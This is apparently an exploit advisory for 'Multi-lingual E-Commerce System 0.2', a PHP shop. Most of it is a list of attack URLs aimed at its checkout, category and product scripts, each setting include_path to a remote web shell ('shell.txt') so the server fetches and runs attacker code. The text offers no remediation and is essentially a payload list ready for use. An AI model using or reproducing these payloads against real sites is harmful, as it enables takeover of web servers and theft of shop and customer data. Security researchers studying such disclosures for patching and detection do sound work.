Multi-lingual E-Commerce System 0.2 Multiple Remote File Inclusion Vulnerabilities bug found by Jose Luis Gongora Fernandez (a.k.a) JosS contact: sys-project[at]hotmail.com website: http://www.hack0wn.com/ - download: http://sourceforge.net/projects/mlecsphp/ - CMS: A multi-lingual multi-currency PHP e-commerce system. ~ [RFI] http://target/path/inc/checkout2-CYM.php?include_path=[shell.txt?] http://target/path/inc/checkout2-EN.php?include_path=[shell.txt?] http://target/path/inc/checkout2-FR.php?include_path=[shell.txt?] http://target/path/inc/cat-FR.php?include_path=[shell.txt?] http://target/path/inc/cat-EN.php?include_path=[shell.txt?] http://target/path/inc/cat-CYM.php?include_path=[shell.txt?] http://target/path/inc/checkout1-CYM.php?include_path=[shell.txt?] http://target/path/inc/checkout1-EN.php?include_path=[shell.txt?] http://target/path/inc/checkout1-FR.php?include_path=[shell.txt?] http://target/path/inc/prod-CYM.php?include_path=[shell.txt?] http://target/path/inc/prod-EN.php?include_path=[shell.txt?] http://target/path/inc/prod-FR.php?include_path=[shell.txt?] [and more] [...] __h0__